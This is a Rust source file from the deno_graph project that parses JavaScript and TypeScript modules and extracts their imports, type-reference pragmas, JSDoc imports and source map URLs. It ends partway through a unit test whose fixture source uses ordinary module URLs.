denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/ast/mod.rs | src/ast/mod.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use crate::analysis::DependencyDescriptor;
use crate::analysis::DynamicArgument;
use crate::analysis::DynamicDependencyDescriptor;
use crate::analysis::DynamicTemplatePart;
use crate::analysis::JsDocImportInfo;
use crate::analysis::ModuleAnalyzer;
use crate::analysis::ModuleInfo;
use crate::analysis::SpecifierWithRange;
use crate::analysis::StaticDependencyDescriptor;
use crate::analysis::TypeScriptReference;
use crate::analysis::TypeScriptTypesResolutionMode;
use crate::analysis::find_deno_types;
use crate::analysis::find_jsx_import_source;
use crate::analysis::find_jsx_import_source_types;
use crate::analysis::find_path_reference;
use crate::analysis::find_resolution_mode;
use crate::analysis::find_source_mapping_url;
use crate::analysis::find_ts_self_types;
use crate::analysis::find_ts_types;
use crate::analysis::find_types_reference;
use crate::analysis::is_comment_triple_slash_reference;
use crate::graph::Position;
use crate::graph::PositionRange;
use crate::module_specifier::ModuleSpecifier;
use deno_ast::MultiThreadedComments;
use deno_ast::ProgramRef;
use deno_ast::SourcePos;
use deno_ast::SourceRanged;
use deno_ast::SourceRangedForSpanned;
use deno_ast::MediaType;
use deno_ast::ParseDiagnostic;
use deno_ast::ParsedSource;
use deno_ast::SourceTextInfo;
use deno_ast::swc::common::comments::CommentKind;
use deno_error::JsErrorBox;
use std::cell::RefCell;
use std::collections::HashMap;
use std::sync::Arc;
use self::dep::DependencyComment;
use self::dep::analyze_program_dependencies;
mod dep;
/// Options for parsing a module's source text.
pub struct ParseOptions<'a> {
  /// Specifier of the module being parsed.
  pub specifier: &'a ModuleSpecifier,
  /// The module's source text.
  pub source: Arc<str>,
  /// Media type that determines the syntax used when parsing.
  pub media_type: MediaType,
  /// Whether to additionally perform scope analysis.
  pub scope_analysis: bool,
}
/// Parses programs to a ParsedSource.
pub trait EsParser {
  /// Parses the source described by `options` into a `ParsedSource`,
  /// returning the parse diagnostic on failure.
  fn parse_program(
    &self,
    options: ParseOptions,
  ) -> Result<ParsedSource, ParseDiagnostic>;
}
/// Parser that delegates directly to `deno_ast`.
#[derive(Default, Clone)]
pub struct DefaultEsParser;
impl EsParser for DefaultEsParser {
  /// Parses with `deno_ast::parse_program`; requesting scope analysis
  /// also turns on token capturing, which it requires.
  fn parse_program(
    &self,
    options: ParseOptions,
  ) -> Result<ParsedSource, ParseDiagnostic> {
    let params = deno_ast::ParseParams {
      specifier: options.specifier.clone(),
      text: options.source,
      media_type: options.media_type,
      capture_tokens: options.scope_analysis,
      scope_analysis: options.scope_analysis,
      maybe_syntax: None,
    };
    deno_ast::parse_program(params)
  }
}
/// Stores parsed sources.
///
/// Note: This interface is racy and not thread safe, as it's assumed
/// it will only store the latest changes or that the source text
/// will never change.
pub trait ParsedSourceStore {
  /// Sets the parsed source, potentially returning the previous value.
  fn set_parsed_source(
    &self,
    specifier: ModuleSpecifier,
    parsed_source: ParsedSource,
  ) -> Option<ParsedSource>;
  /// Gets a previously stored parsed source for the specifier, if any.
  fn get_parsed_source(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<ParsedSource>;
  /// Removes and returns the stored parsed source, if any.
  fn remove_parsed_source(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<ParsedSource>;
  /// Gets a `deno_ast::ParsedSource` from the store, upgrading it
  /// to have scope analysis if it doesn't already.
  fn get_scope_analysis_parsed_source(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<ParsedSource>;
}
/// Default store that works on a single thread.
#[derive(Default)]
pub struct DefaultParsedSourceStore {
  // interior mutability lets the trait's `&self` methods mutate the map
  store: RefCell<HashMap<ModuleSpecifier, ParsedSource>>,
}
impl ParsedSourceStore for DefaultParsedSourceStore {
  /// Stores the parsed source, returning any previously stored value.
  fn set_parsed_source(
    &self,
    specifier: ModuleSpecifier,
    parsed_source: ParsedSource,
  ) -> Option<ParsedSource> {
    self.store.borrow_mut().insert(specifier, parsed_source)
  }
  /// Returns a clone of the stored parsed source, if any.
  fn get_parsed_source(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<ParsedSource> {
    self.store.borrow().get(specifier).cloned()
  }
  /// Removes and returns the stored parsed source, if any.
  fn remove_parsed_source(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<ParsedSource> {
    self.store.borrow_mut().remove(specifier)
  }
  /// Returns the stored parsed source, upgrading it in place to have
  /// scope analysis when it doesn't already.
  fn get_scope_analysis_parsed_source(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<ParsedSource> {
    let mut store = self.store.borrow_mut();
    let parsed_source = store.get_mut(specifier)?;
    if parsed_source.has_scope_analysis() {
      Some(parsed_source.clone())
    } else {
      // upgrade: take the entry out, add scope analysis, and put the
      // analyzed copy back so later lookups get the upgraded version
      let parsed_source = store.remove(specifier).unwrap();
      let parsed_source = parsed_source.into_with_scope_analysis();
      store.insert(specifier.clone(), parsed_source.clone());
      // return the owned value directly — the previous code cloned a
      // second time here (`Some(parsed_source.clone())`), which was
      // a redundant allocation
      Some(parsed_source)
    }
  }
}
/// A parser that stores parsed files in the provided store after parsing.
/// Parses that match a previously stored source are reused from the store
/// instead of being re-parsed.
///
/// Note that this will insert into the store whatever was
/// last parsed, so if two threads race to parse, when they're
/// both done it will have whatever was last stored.
#[derive(Clone, Copy)]
pub struct CapturingEsParser<'a> {
  // optional underlying parser; `None` falls back to the default parser
  parser: Option<&'a dyn EsParser>,
  // store that captured parses are written to and read from
  store: &'a dyn ParsedSourceStore,
}
impl<'a> CapturingEsParser<'a> {
pub fn new(
parser: Option<&'a dyn EsParser>,
store: &'a dyn ParsedSourceStore,
) -> Self {
Self { parser, store }
}
fn get_from_store_if_matches(
&self,
options: &ParseOptions,
) -> Option<ParsedSource> {
let parsed_source = if options.scope_analysis {
self
.store
.get_scope_analysis_parsed_source(options.specifier)?
} else {
self.store.get_parsed_source(options.specifier)?
};
if parsed_source.media_type() == options.media_type
&& parsed_source.text().as_ref() == options.source.as_ref()
{
Some(parsed_source)
} else {
None
}
}
}
impl EsParser for CapturingEsParser<'_> {
  /// Returns a matching stored parse when available; otherwise parses
  /// (with the default parser as a fallback) and captures the result.
  fn parse_program(
    &self,
    options: ParseOptions,
  ) -> Result<ParsedSource, ParseDiagnostic> {
    if let Some(parsed_source) = self.get_from_store_if_matches(&options) {
      return Ok(parsed_source);
    }
    let default_parser = DefaultEsParser;
    let parser = self.parser.unwrap_or(&default_parser);
    // the specifier is needed after `options` is consumed by the parse
    let specifier = options.specifier.clone();
    let parsed_source = parser.parse_program(options)?;
    self
      .store
      .set_parsed_source(specifier, parsed_source.clone());
    Ok(parsed_source)
  }
}
/// Module analyzer that parses with the default parser on every call.
#[derive(Default)]
pub struct DefaultModuleAnalyzer;
#[async_trait::async_trait(?Send)]
impl ModuleAnalyzer for DefaultModuleAnalyzer {
  /// Analyzes by delegating to a `ParserModuleAnalyzer` backed by the
  /// default parser.
  async fn analyze(
    &self,
    specifier: &deno_ast::ModuleSpecifier,
    source: Arc<str>,
    media_type: MediaType,
  ) -> Result<ModuleInfo, JsErrorBox> {
    let analyzer = ParserModuleAnalyzer::default();
    analyzer.analyze(specifier, source, media_type).await
  }
}
/// Default module analyzer that analyzes based on a deno_ast::ParsedSource.
pub struct ParserModuleAnalyzer<'a> {
  // parser used to turn source text into a `ParsedSource`
  parser: &'a dyn EsParser,
}
impl<'a> ParserModuleAnalyzer<'a> {
  /// Creates a new module analyzer.
  pub fn new(parser: &'a dyn EsParser) -> Self {
    Self { parser }
  }
  /// Gets the module info from a parsed source.
  pub fn module_info(parsed_source: &ParsedSource) -> ModuleInfo {
    let program = parsed_source.program_ref();
    Self::module_info_from_swc(
      parsed_source.media_type(),
      program,
      parsed_source.text_info_lazy(),
      parsed_source.comments(),
    )
  }
  /// Builds a `ModuleInfo` from an already-parsed swc program: gathers
  /// dependencies, triple-slash references, self types, JSX import source
  /// pragmas, JSDoc imports, and the source map URL.
  pub fn module_info_from_swc(
    media_type: MediaType,
    program: ProgramRef,
    text_info: &SourceTextInfo,
    comments: &MultiThreadedComments,
  ) -> ModuleInfo {
    // Leading comments used for pragma analysis: taken from the first
    // module item when there is one; for an empty program with a shebang
    // the comments are looked up as trailing comments at the program end
    // (NOTE(review): presumably how swc attaches them in that case —
    // confirm before changing).
    let leading_comments = match program.body().next() {
      Some(item) => comments.get_leading(item.start()),
      None => match program.shebang() {
        Some(_) => comments.get_trailing(program.end()),
        None => comments.get_leading(program.start()),
      },
    };
    // Get trailing comments from the program end to extract sourceMappingURL
    // which is typically at the very end of the file
    let trailing_comments = comments.get_trailing(program.end());
    ModuleInfo {
      is_script: program.compute_is_script(),
      dependencies: analyze_dependencies(program, text_info, comments),
      ts_references: analyze_ts_references(text_info, leading_comments),
      self_types_specifier: analyze_ts_self_types(
        media_type,
        text_info,
        leading_comments,
      ),
      jsx_import_source: analyze_jsx_import_source(
        media_type,
        text_info,
        leading_comments,
      ),
      jsx_import_source_types: analyze_jsx_import_source_types(
        media_type,
        text_info,
        leading_comments,
      ),
      jsdoc_imports: analyze_jsdoc_imports(media_type, text_info, comments),
      source_map_url: analyze_source_map_url(text_info, trailing_comments),
    }
  }
  /// Synchronously parses and analyzes a module.
  ///
  /// Returns the parse diagnostic when the source fails to parse.
  pub fn analyze_sync(
    &self,
    specifier: &deno_ast::ModuleSpecifier,
    source: Arc<str>,
    media_type: MediaType,
  ) -> Result<ModuleInfo, ParseDiagnostic> {
    let parsed_source = self.parser.parse_program(ParseOptions {
      specifier,
      source,
      media_type,
      // scope analysis is not necessary for module parsing
      scope_analysis: false,
    })?;
    Ok(ParserModuleAnalyzer::module_info(&parsed_source))
  }
}
impl Default for ParserModuleAnalyzer<'_> {
  fn default() -> Self {
    Self {
      // `&DefaultEsParser` is a reference to a unit struct, which is
      // statically promoted, so the default analyzer borrows nothing
      parser: &DefaultEsParser,
    }
  }
}
#[async_trait::async_trait(?Send)]
impl ModuleAnalyzer for ParserModuleAnalyzer<'_> {
  /// Async wrapper over `analyze_sync`, boxing any parse diagnostic into
  /// a `JsErrorBox`.
  async fn analyze(
    &self,
    specifier: &deno_ast::ModuleSpecifier,
    source: Arc<str>,
    media_type: MediaType,
  ) -> Result<ModuleInfo, JsErrorBox> {
    let result = self.analyze_sync(specifier, source, media_type);
    result.map_err(JsErrorBox::from_err)
  }
}
/// Helper struct for creating a single object that implements
/// `deno_graph::ModuleAnalyzer`, `deno_graph::EsParser`,
/// and `deno_graph::ParsedSourceStore`. All parses will be captured
/// to prevent them from occurring more than one time.
pub struct CapturingModuleAnalyzer {
  // underlying parser used when a parse isn't already stored
  parser: Box<dyn EsParser>,
  // store that captured parses are written to and read from
  store: Box<dyn ParsedSourceStore>,
}
impl Default for CapturingModuleAnalyzer {
  /// Builds an analyzer with the default parser and default store.
  fn default() -> Self {
    Self::new(None, None)
  }
}
impl CapturingModuleAnalyzer {
pub fn new(
parser: Option<Box<dyn EsParser>>,
store: Option<Box<dyn ParsedSourceStore>>,
) -> Self {
Self {
parser: parser.unwrap_or_else(|| Box::<DefaultEsParser>::default()),
store: store
.unwrap_or_else(|| Box::<DefaultParsedSourceStore>::default()),
}
}
pub fn as_capturing_parser(&self) -> CapturingEsParser<'_> {
CapturingEsParser::new(Some(&*self.parser), &*self.store)
}
}
#[async_trait::async_trait(?Send)]
impl ModuleAnalyzer for CapturingModuleAnalyzer {
  /// Analyzes a module while capturing the parsed source in the store so
  /// later requests for the same specifier can reuse the parse.
  async fn analyze(
    &self,
    specifier: &deno_ast::ModuleSpecifier,
    source: Arc<str>,
    media_type: MediaType,
  ) -> Result<ModuleInfo, JsErrorBox> {
    let parser = self.as_capturing_parser();
    ParserModuleAnalyzer::new(&parser)
      .analyze(specifier, source, media_type)
      .await
  }
}
impl EsParser for CapturingModuleAnalyzer {
  /// Parses through the capturing parser so the result is stored for reuse.
  fn parse_program(
    &self,
    options: ParseOptions,
  ) -> Result<ParsedSource, ParseDiagnostic> {
    self.as_capturing_parser().parse_program(options)
  }
}
// Every method simply delegates to the inner store.
impl ParsedSourceStore for CapturingModuleAnalyzer {
  // Stores a parsed source, returning any previously stored one.
  fn set_parsed_source(
    &self,
    specifier: ModuleSpecifier,
    parsed_source: ParsedSource,
  ) -> Option<ParsedSource> {
    self.store.set_parsed_source(specifier, parsed_source)
  }
  // Fetches a previously captured parse, if any.
  fn get_parsed_source(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<ParsedSource> {
    self.store.get_parsed_source(specifier)
  }
  // Removes and returns a captured parse.
  fn remove_parsed_source(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<ParsedSource> {
    self.store.remove_parsed_source(specifier)
  }
  // Fetches a parse that has had scope analysis applied, if available.
  fn get_scope_analysis_parsed_source(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<ParsedSource> {
    self.store.get_scope_analysis_parsed_source(specifier)
  }
}
/// Converts the raw dependency descriptors produced by the swc-based
/// analysis into the public `DependencyDescriptor` representation,
/// resolving byte ranges to line/column positions and attaching any
/// `@ts-types`/`@deno-types` pragma found in the leading comments.
fn analyze_dependencies(
  program: deno_ast::ProgramRef,
  text_info: &SourceTextInfo,
  comments: &MultiThreadedComments,
) -> Vec<DependencyDescriptor> {
  let deps = analyze_program_dependencies(program, comments);
  deps
    .into_iter()
    .map(|d| match d {
      self::dep::DependencyDescriptor::Static(d) => {
        DependencyDescriptor::Static(StaticDependencyDescriptor {
          kind: d.kind,
          // types pragma in the comment directly above the import
          types_specifier: analyze_ts_or_deno_types(
            text_info,
            &d.leading_comments,
          ),
          specifier: d.specifier.to_string(),
          specifier_range: PositionRange::from_source_range(
            d.specifier_range,
            text_info,
          ),
          import_attributes: d.import_attributes,
          is_side_effect: d.is_side_effect,
        })
      }
      self::dep::DependencyDescriptor::Dynamic(d) => {
        DependencyDescriptor::Dynamic(DynamicDependencyDescriptor {
          kind: d.kind,
          types_specifier: analyze_ts_or_deno_types(
            text_info,
            &d.leading_comments,
          ),
          // a dynamic import argument may be a plain string, a template
          // literal (possibly with expression holes), or an arbitrary
          // expression that cannot be statically analyzed
          argument: match d.argument {
            self::dep::DynamicArgument::String(text) => {
              DynamicArgument::String(text.to_string())
            }
            self::dep::DynamicArgument::Template(parts) => {
              DynamicArgument::Template(
                parts
                  .into_iter()
                  .map(|part| match part {
                    self::dep::DynamicTemplatePart::String(text) => {
                      DynamicTemplatePart::String {
                        value: text.to_string(),
                      }
                    }
                    self::dep::DynamicTemplatePart::Expr => {
                      DynamicTemplatePart::Expr
                    }
                  })
                  .collect(),
              )
            }
            self::dep::DynamicArgument::Expr => DynamicArgument::Expr,
          },
          argument_range: PositionRange::from_source_range(
            d.argument_range,
            text_info,
          ),
          import_attributes: d.import_attributes,
        })
      }
    })
    .collect()
}
/// Collects `/// <reference path="..." />` and `/// <reference types="..." />`
/// directives from the module's leading line comments.
fn analyze_ts_references(
  text_info: &SourceTextInfo,
  leading_comments: Option<&Vec<deno_ast::swc::common::comments::Comment>>,
) -> Vec<TypeScriptReference> {
  let Some(comments) = leading_comments else {
    return Vec::new();
  };
  comments
    .iter()
    // only line comments that look like triple-slash references qualify
    .filter(|c| {
      c.kind == CommentKind::Line
        && is_comment_triple_slash_reference(&c.text)
    })
    .filter_map(|comment| {
      let comment_start = comment.start();
      if let Some(m) = find_path_reference(&comment.text) {
        Some(TypeScriptReference::Path(SpecifierWithRange {
          text: m.as_str().to_string(),
          range: comment_source_to_position_range(
            comment_start,
            m.range(),
            text_info,
            false,
          ),
        }))
      } else {
        let m = find_types_reference(&comment.text)?;
        // an optional resolution-mode attribute may follow the types ref
        let resolution_mode = find_resolution_mode(&comment.text)
          .and_then(|m| TypeScriptTypesResolutionMode::from_str(m.as_str()));
        Some(TypeScriptReference::Types {
          specifier: SpecifierWithRange {
            text: m.as_str().to_string(),
            range: comment_source_to_position_range(
              comment_start,
              m.range(),
              text_info,
              false,
            ),
          },
          resolution_mode,
        })
      }
    })
    .collect()
}
/// Finds a `@jsxImportSource` pragma in the module's leading comments.
/// Only applies to JSX-capable media types; only block comments count.
fn analyze_jsx_import_source(
  media_type: MediaType,
  text_info: &SourceTextInfo,
  leading_comments: Option<&Vec<deno_ast::swc::common::comments::Comment>>,
) -> Option<SpecifierWithRange> {
  if !matches!(media_type, MediaType::Jsx | MediaType::Tsx) {
    return None;
  }
  for comment in leading_comments? {
    // line comments are not a valid carrier for the pragma
    if comment.kind != CommentKind::Block {
      continue;
    }
    if let Some(m) = find_jsx_import_source(&comment.text) {
      return Some(SpecifierWithRange {
        text: m.as_str().to_string(),
        range: comment_source_to_position_range(
          comment.start(),
          m.range(),
          text_info,
          true,
        ),
      });
    }
  }
  None
}
/// Finds a `@jsxImportSourceTypes` pragma in the module's leading comments.
/// Only applies to JSX-capable media types; only block comments count.
fn analyze_jsx_import_source_types(
  media_type: MediaType,
  text_info: &SourceTextInfo,
  leading_comments: Option<&Vec<deno_ast::swc::common::comments::Comment>>,
) -> Option<SpecifierWithRange> {
  if !matches!(media_type, MediaType::Jsx | MediaType::Tsx) {
    return None;
  }
  for comment in leading_comments? {
    // line comments are not a valid carrier for the pragma
    if comment.kind != CommentKind::Block {
      continue;
    }
    if let Some(m) = find_jsx_import_source_types(&comment.text) {
      return Some(SpecifierWithRange {
        text: m.as_str().to_string(),
        range: comment_source_to_position_range(
          comment.start(),
          m.range(),
          text_info,
          true,
        ),
      });
    }
  }
  None
}
/// Finds a `@ts-self-types` pragma in the module's leading comments.
/// Skipped for already-typed media types, where the pragma is meaningless.
fn analyze_ts_self_types(
  media_type: MediaType,
  text_info: &SourceTextInfo,
  leading_comments: Option<&Vec<deno_ast::swc::common::comments::Comment>>,
) -> Option<SpecifierWithRange> {
  if media_type.is_typed() {
    return None;
  }
  for comment in leading_comments? {
    if let Some(m) = find_ts_self_types(&comment.text) {
      return Some(SpecifierWithRange {
        text: m.as_str().to_string(),
        range: comment_source_to_position_range(
          comment.start(),
          m.range(),
          text_info,
          false,
        ),
      });
    }
  }
  None
}
/// Searches the trailing comments for a source map URL directive,
/// scanning backwards since it conventionally sits at the end of a file.
fn analyze_source_map_url(
  text_info: &SourceTextInfo,
  trailing_comments: Option<&Vec<deno_ast::swc::common::comments::Comment>>,
) -> Option<SpecifierWithRange> {
  for comment in trailing_comments?.iter().rev() {
    if let Some(url) = find_source_mapping_url(&comment.text) {
      return Some(SpecifierWithRange {
        text: url.as_str().to_string(),
        range: comment_source_to_position_range(
          comment.start(),
          url.range(),
          text_info,
          true,
        ),
      });
    }
  }
  None
}
/// Searches comments for any `@ts-types` or `@deno-types` compiler hints.
///
/// Only the last comment before the dependency is considered, and
/// `@ts-types` takes precedence over `@deno-types`.
pub fn analyze_ts_or_deno_types(
  text_info: &SourceTextInfo,
  leading_comments: &[DependencyComment],
) -> Option<SpecifierWithRange> {
  let comment = leading_comments.last()?;
  match find_ts_types(&comment.text) {
    Some(m) => Some(SpecifierWithRange {
      text: m.as_str().to_string(),
      range: comment_source_to_position_range(
        comment.range.start(),
        m.range(),
        text_info,
        false,
      ),
    }),
    None => {
      let deno_types = find_deno_types(&comment.text)?;
      Some(SpecifierWithRange {
        text: deno_types.text.to_string(),
        range: comment_source_to_position_range(
          comment.range.start(),
          deno_types.range,
          text_info,
          // quoteless @deno-types pragmas get no quote padding
          deno_types.is_quoteless,
        ),
      })
    }
  }
}
/// Collects `@import` declarations and `{import("...")}` type references
/// from JSDoc comments, returning them sorted by source position.
fn analyze_jsdoc_imports(
  media_type: MediaType,
  text_info: &SourceTextInfo,
  comments: &MultiThreadedComments,
) -> Vec<JsDocImportInfo> {
  // Analyze any JSDoc type imports
  // We only analyze these on JavaScript types of modules, since they are
  // ignored by TypeScript when type checking anyway and really shouldn't be
  // there, but some people do strange things.
  if !matches!(
    media_type,
    MediaType::JavaScript | MediaType::Jsx | MediaType::Mjs | MediaType::Cjs
  ) {
    return Vec::new();
  }
  let mut deps = Vec::new();
  for comment in comments.iter_unstable() {
    // only `/** ... */` JSDoc blocks qualify (their text starts with '*')
    if comment.kind != CommentKind::Block || !comment.text.starts_with('*') {
      continue;
    }
    // try every '{' as a potential `{import("...")}` type reference and
    // every "@import" occurrence as a potential import declaration
    let js_docs = comment
      .text
      .match_indices("{")
      .filter_map(|(i, _)| {
        parse_jsdoc_dynamic_import(&comment.text[i..])
          .ok()
          .map(|(_input, jsdoc)| (i, jsdoc))
      })
      .chain(comment.text.match_indices("@import").filter_map(|(i, _)| {
        parse_jsdoc_import_decl(&comment.text[i..])
          .ok()
          .map(|(_input, jsdoc)| (i, jsdoc))
      }));
    for (byte_index, js_doc) in js_docs {
      deps.push(JsDocImportInfo {
        specifier: SpecifierWithRange {
          text: js_doc.specifier,
          // the parsed range is relative to the slice that was parsed, so
          // shift it by the slice's byte offset within the comment
          range: comment_source_to_position_range(
            comment.range().start,
            byte_index + js_doc.specifier_range.start
              ..byte_index + js_doc.specifier_range.end,
            text_info,
            false,
          ),
        },
        resolution_mode: js_doc.resolution_mode,
      });
    }
  }
  // the two scans above can discover imports out of source order
  deps.sort_by(|a, b| a.specifier.range.start.cmp(&b.specifier.range.start));
  deps
}
// Intermediate result of parsing a single JSDoc import occurrence.
#[derive(Debug, Clone)]
struct JsDocImport {
  // The import specifier text without surrounding quotes.
  specifier: String,
  // Byte range of the specifier text (quotes excluded), relative to the
  // start of the slice that was handed to the parse function.
  specifier_range: std::ops::Range<usize>,
  // Value of a `resolution-mode` import attribute, when present and valid.
  resolution_mode: Option<TypeScriptTypesResolutionMode>,
}
/// Parses a JSDoc `@import` declaration such as
/// `@import { Foo } from "./foo.ts"` or `@import * as ns from "./ns.ts"`,
/// optionally followed by `with { ... }` import attributes.
fn parse_jsdoc_import_decl(input: &str) -> monch::ParseResult<'_, JsDocImport> {
  use monch::*;
  fn skip_named_imports(input: &str) -> monch::ParseResult<'_, ()> {
    // { ... }
    let (input, _) = ch('{')(input)?;
    let (input, _) = monch::take_while(|c| c != '}')(input)?;
    let (input, _) = ch('}')(input)?;
    Ok((input, ()))
  }
  fn skip_namespace_import(input: &str) -> monch::ParseResult<'_, ()> {
    // * as ns
    let (input, _) = ch('*')(input)?;
    let (input, _) = skip_whitespace(input)?;
    let (input, _) = tag("as")(input)?;
    let (input, _) = whitespace(input)?;
    let (input, _) = parse_ident(input)?;
    Ok((input, ()))
  }
  // `with { ... }` — extracts an optional resolution-mode attribute
  fn parse_attributes(
    input: &str,
  ) -> ParseResult<'_, Option<TypeScriptTypesResolutionMode>> {
    let (input, _) = tag("with")(input)?;
    let (input, _) = skip_whitespace(input)?;
    let (input, maybe_resolution_mode) =
      parse_import_attribute_block_for_resolution_mode(input)?;
    Ok((input, maybe_resolution_mode))
  }
  let initial_input = input;
  let (input, _) = tag("@import")(input)?;
  let (input, _) = whitespace(input)?;
  // named imports, a namespace import, or a plain default binding
  let (input, _) = or3(
    skip_named_imports,
    terminated(skip_namespace_import, whitespace),
    terminated(map(parse_ident, |_| ()), whitespace),
  )(input)?;
  let (input, _) = skip_whitespace(input)?;
  let (input, _) = tag("from")(input)?;
  let (input, _) = skip_whitespace(input)?;
  let start_specifier_input = input;
  let (input, specifier) = parse_quote(input)?;
  let end_specifier_input = input;
  let (input, _) = skip_whitespace(input)?;
  let (input, maybe_resolution_mode) = maybe(parse_attributes)(input)?;
  Ok((
    input,
    JsDocImport {
      specifier: specifier.to_string(),
      // offsets are derived from how much input each step consumed; the
      // +1/-1 trim the surrounding quotes out of the range
      specifier_range: initial_input.len() - start_specifier_input.len() + 1
        ..initial_input.len() - end_specifier_input.len() - 1,
      resolution_mode: maybe_resolution_mode.flatten(),
    },
  ))
}
/// Matches a JSDoc import type reference (`{import("./example.js")}`),
/// optionally with a second `{ with: { ... } }` options argument.
fn parse_jsdoc_dynamic_import(
  input: &str,
) -> monch::ParseResult<'_, JsDocImport> {
  // `, { with: { ... } }` — the optional import-attributes argument
  fn parse_second_param_obj_with_leading_comma(
    input: &str,
  ) -> monch::ParseResult<'_, Option<TypeScriptTypesResolutionMode>> {
    let (input, _) = ch(',')(input)?;
    let (input, _) = skip_whitespace(input)?;
    let (input, _) = ch('{')(input)?;
    let (input, _) = skip_whitespace(input)?;
    let (input, _) = tag("with")(input)?;
    let (input, _) = skip_whitespace(input)?;
    let (input, _) = ch(':')(input)?;
    let (input, _) = skip_whitespace(input)?;
    let (input, maybe_resolution_mode) =
      parse_import_attribute_block_for_resolution_mode(input)?;
    let (input, _) = skip_whitespace(input)?;
    let (input, _) = ch('}')(input)?;
    Ok((input, maybe_resolution_mode))
  }
  // \{[^}]*import\(['"]([^'"]+)['"]\)[^}]*}"
  use monch::*;
  let original_input = input;
  let (mut input, _) = ch('{')(input)?;
  {
    // scan forward to the `import` keyword, bailing out if the JSDoc type
    // expression closes before one is found
    let original_input = input;
    for (index, c) in input.char_indices() {
      if c == '}' {
        return ParseError::backtrace();
      }
      input = &original_input[index..];
      if input.starts_with("import") {
        break;
      }
    }
  }
  let (input, _) = tag("import")(input)?;
  let (input, _) = skip_whitespace(input)?;
  let (input, _) = ch('(')(input)?;
  let (input, _) = skip_whitespace(input)?;
  let start_specifier_input = input;
  let (input, specifier) = parse_quote(input)?;
  let end_specifier_input = input;
  let (input, _) = skip_whitespace(input)?;
  let (input, maybe_resolution_mode) =
    maybe(parse_second_param_obj_with_leading_comma)(input)?;
  let (input, _) = skip_whitespace(input)?;
  let (input, _) = ch(')')(input)?;
  let (input, _) = take_while(|c| c != '}')(input)?;
  let (input, _) = ch('}')(input)?;
  Ok((
    input,
    JsDocImport {
      specifier: specifier.to_string(),
      // offsets are derived from consumed input; +1/-1 trim the quotes
      specifier_range: original_input.len() - start_specifier_input.len() + 1
        ..original_input.len() - end_specifier_input.len() - 1,
      resolution_mode: maybe_resolution_mode.flatten(),
    },
  ))
}
fn parse_import_attribute_block_for_resolution_mode(
input: &str,
) -> monch::ParseResult<'_, Option<TypeScriptTypesResolutionMode>> {
use monch::*;
map(parse_import_attribute_block, |attributes| {
attributes
.iter()
.find(|(key, _)| *key == "resolution-mode")
.and_then(|(_, value)| TypeScriptTypesResolutionMode::from_str(value))
})(input)
}
/// Parses a `{ key: "value", ... }` import attribute block into key/value
/// pairs. Keys may be quoted strings or bare identifiers; values must be
/// quoted.
fn parse_import_attribute_block(
  input: &str,
) -> monch::ParseResult<'_, Vec<(&str, &str)>> {
  use monch::*;
  // a single `key: "value"` entry
  fn parse_attribute(input: &str) -> ParseResult<'_, (&str, &str)> {
    let (input, key) = or(parse_quote, parse_ident)(input)?;
    let (input, _) = skip_whitespace(input)?;
    let (input, _) = ch(':')(input)?;
    let (input, _) = skip_whitespace(input)?;
    let (input, value) = parse_quote(input)?;
    Ok((input, (key, value)))
  }
  let (input, _) = ch('{')(input)?;
  let (input, _) = skip_whitespace(input)?;
  let (input, attributes) = separated_list(
    parse_attribute,
    delimited(skip_whitespace, ch(','), skip_whitespace),
  )(input)?;
  let (input, _) = skip_whitespace(input)?;
  let (input, _) = ch('}')(input)?;
  Ok((input, attributes))
}
/// Parses an identifier: an alphabetic first character followed by any run
/// of characters that are not whitespace, ':', or '-'.
fn parse_ident(input: &str) -> monch::ParseResult<'_, &str> {
  use monch::*;
  let full_input = input;
  let (input, first_char) = next_char(input)?;
  // identifiers must begin with an alphabetic character
  if !first_char.is_alphabetic() {
    return Err(ParseError::Backtrace);
  }
  // consume the remainder; good enough for the JSDoc shapes handled here
  let (input, _) =
    take_while(|c| !c.is_whitespace() && c != ':' && c != '-')(input)?;
  let consumed = full_input.len() - input.len();
  Ok((input, &full_input[..consumed]))
}
/// Parses a quoted string, accepting either quote style and requiring the
/// same character to close. Returns the contents without the quotes.
fn parse_quote(input: &str) -> monch::ParseResult<'_, &str> {
  use monch::*;
  let (input, quote_char) = or(ch('"'), ch('\''))(input)?;
  let (input, contents) = take_while(|c| c != quote_char)(input)?;
  let (input, _) = ch(quote_char)(input)?;
  Ok((input, contents))
}
/// Converts a byte range inside a comment's text into a line/column
/// `PositionRange` within the whole source file.
fn comment_source_to_position_range(
  comment_start: SourcePos,
  inner_range: std::ops::Range<usize>,
  text_info: &SourceTextInfo,
  is_specifier_quoteless: bool,
) -> PositionRange {
  // the comment text starts after the `//` or `/*` delimiter, so add 2
  let text_start = comment_start + 2;
  // widen by 1 on each side to include the quotes, except for pragma
  // forms that carry no quotes
  let quote_padding = if is_specifier_quoteless { 0 } else { 1 };
  let start_pos = text_start + inner_range.start - quote_padding;
  let end_pos = text_start + inner_range.end + quote_padding;
  PositionRange {
    start: Position::from_source_pos(start_pos, text_info),
    end: Position::from_source_pos(end_pos, text_info),
  }
}
#[cfg(test)]
mod tests {
use crate::analysis::JsDocImportInfo;
use super::*;
use pretty_assertions::assert_eq;
#[test]
fn test_parse() {
let specifier =
ModuleSpecifier::parse("file:///a/test.tsx").expect("bad specifier");
let source = r#"
/// <reference path="./ref.d.ts" />
/// <reference types="./types.d.ts" />
// @jsxImportSource http://example.com/invalid
/* @jsxImportSource http://example.com/preact */
// @jsxImportSourceTypes http://example.com/invalidTypes
/* @jsxImportSourceTypes http://example.com/preactTypes */
import {
A,
B,
C,
D,
} from "https://deno.land/x/example@v1.0.0/mod.ts";
export * from "./mod.ts";
import type { Component } from "https://esm.sh/preact";
import { h, Fragment } from "https://esm.sh/preact";
// other
// @deno-types="https://deno.land/x/types/react/index.d.ts"
import React from "https://cdn.skypack.dev/react";
// @deno-types=https://deno.land/x/types/react/index.d.ts
import React2 from "https://cdn.skypack.dev/react";
// @deno-types="https://deno.land/x/types/react/index.d.ts"
// other comment first
